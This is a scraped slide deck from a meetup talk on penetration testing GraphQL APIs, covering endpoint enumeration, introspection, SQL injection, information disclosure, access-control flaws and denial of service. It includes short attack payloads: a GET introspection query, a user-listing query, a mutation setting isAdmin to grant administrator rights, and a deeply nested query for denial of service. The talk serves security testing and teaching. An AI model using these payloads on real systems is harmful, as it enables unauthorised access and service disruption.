SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptxSOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
 
APM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across SectorsAPM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across Sectors
 
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
 
Web & Social Media Analytics Previous Year Question Paper.pdf
Web & Social Media Analytics Previous Year Question Paper.pdfWeb & Social Media Analytics Previous Year Question Paper.pdf
Web & Social Media Analytics Previous Year Question Paper.pdf
 
Mattingly "AI & Prompt Design: The Basics of Prompt Design"
Mattingly "AI & Prompt Design: The Basics of Prompt Design"Mattingly "AI & Prompt Design: The Basics of Prompt Design"
Mattingly "AI & Prompt Design: The Basics of Prompt Design"
 

Pentest Application With GraphQL | Null Bangalore Meetup

  • 1. Pentest Application With GraphQL Presented By: Divyanshu Shukla (@justm0rph3u5) @justm0rph3u5 @justm0rph3u5
  • 2. Agenda • What is GraphQL • REST vs GraphQL • Example for REST/GraphQL • Architecture • Basics • Pentesting GraphQL
  • 3. What Is GraphQL? • New API standard that was invented and open-sourced by Facebook. • GraphQL is a query language for APIs - not databases. • It is database agnostic and effectively can be used in any context where an API is used. • GraphQL enables declarative data fetching. • GraphQL is used in production by multiple companies such as GitHub, Twitter, Coursera, etc.
  • 4. REST vs GraphQL? • Multiple Round Trips To Fetch Related Resources. • Over Fetching / Under Fetching. • Rapid Product Iterations on the Frontend. • Benefits of a Schema & Type System
  • 5. REST vs GraphQL Example
  • 9. Basics Terminology • Schema Definition Language . Object Types & Fields • Arguments . Aliases • Fragments . Variables • Directives • Types of Requests: oQuery oMutations oSubscriptions
  • 10. Pentesting GraphQL • Tools • Enumeration • Introspection • SQL Injection • Information Disclosure • Broken Access Control • Authorization Bypass • Brute Force/Denial Of Service
  • 11. Tools • Altair GraphQL Client/GraphQL ide. • GraphQL Raider (Burp Suite Extension). • GraphQL_Introspection.py (Python script by Doyensec). • GraphQL Vyoger (https://apis.guru/graphql-voyager/).
  • 12. GraphQL Tip • Pentesting an app that uses GraphQL? POST is more common, but remember that it accepts GET too. URL encode & hit /graphql?query=. Eg, a 'schema' request as GET: https://example.com/graphql?query= {__schema%20{%0atypes%20{%0an ame%0akind%0adescription%0afields%20{%0aname%0a}%0a}%0a}%0a} Thanks to https://twitter.com/coffeetocode
  • 13. Enumeration • Look for traffic sent via server to find graphql endpoint. o/graphql/ o/graphql/console/ o/graphql.php o/graphiql/ o/graphiql.php • Try sending a request to API and error is : “Syntax Error: Expected Name, found }”. This confirms graphql. • GraphQL endpoints may have a GUI, if present we can check Docs directly.
  • 14. Introspection • GraphQL allows querying to get metadata via introspection query to find out about the schema with description of data. • It is similar to information_schema tables in databases. • It allows attacker to find what requests exist/what arguments should be passed. • GraphQL Introspection Query: https://gist.github.com/a7v8x/c30d92d2ca2458035aadc41702da367d • Developers can disable this feature but majority of applications leave it open. • Hands-On : Hackerone Ref: https://graphqlmastery.com/blog/graphql-introspection- and-introspection-queries
  • 15. Injection • Most of the applications are connected with any database. So there is a high chance for SQL injection, NoSQL injection and other injections. • Detecting SQL injection and exploiting it using UNION SELECT. • Also using sqlmap for exploitation. • There are high chance that application may have multiple parameters vulnerable to SQL injections. • Example : https://blog.usejournal.com/time-based-blind-sql-injection-in- graphql-39a25a1dfb3c • Hands On: https://pentesterlab.com/exercises/graphql_ii/course
  • 16. Information Disclosure • GraphQL is just a layer between client apps and the database. • Try visiting url/graphql.php?debug=1 to find debug mode and additional error reporting. • Inserting single quote/double quote to find out error related to server and graphql. • Going through the id values/userquery, we will be able to get information about other users (or maybe not, if everything is configured correctly).
  • 17. Broken Access Control • Broken Access control may allow attacker use admin email and brute-force login credentials to get admin level access. • Steps to reproduce: • Accessing other users profile details like id, email. • Vulnerable graphql query: query{ users{ id email isAdmin isActive } }
  • 18. Authorization Bypass • Suppose we can create users: mutation { createPerson (username: ”User1", password: ”user1") { } } • Assuming that there is a certain isAdmin parameter in the handler on the server, we can send a request of the form: mutation { createPerson (username: ”User1", password: ”user1", isAdmin: True) { } } • And make the user User1 an administrator.
  • 19. Brute Force/Denial Of Service • Brute forcing email, id, etc parameters. • Brute forcing mutation and other similar queries. • Low privilege or non-admin user can view details by brute-forcing login credentials where rate limiting is not present. • Nested queries can cause denial of service to the application. query { stories{ title body comments{ comment author{ comments{ author{ comments{ comment author{ comments{ comment author{ comments{ comment author{ name }} } } } } } } } } } }
  • 20. Reference • https://github.com/graphql/graphiql • https://www.slideshare.net/NeeluTripathy2/pentesting-graphql- applications • https://prog.world/pentest-applications-with-graphql/ • https://www.howtographql.com • https://medium.com/@localh0t/discovering-graphql-endpoints-and-sqli- vulnerabilities-5d39f26cea2e • https://blog.doyensec.com/2018/05/17/graphql-security-overview.html • https://voidsec.com/graphql-security-overview-and-testing-tips/ • https://ctf.hacker101.com • https://pentesterlab.com/exercises/graphql_ii/course